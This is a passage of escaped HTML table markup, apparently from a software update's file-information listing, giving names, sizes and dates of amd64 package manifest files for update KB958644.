class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,459</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,126</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,056</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,966</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,892</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,966</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,894</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,966</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,894</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,754</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,461</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_1~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,384</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,732</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,421</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,423</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,442</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,429</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,448</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,428</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpesrv~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,447</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">16-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 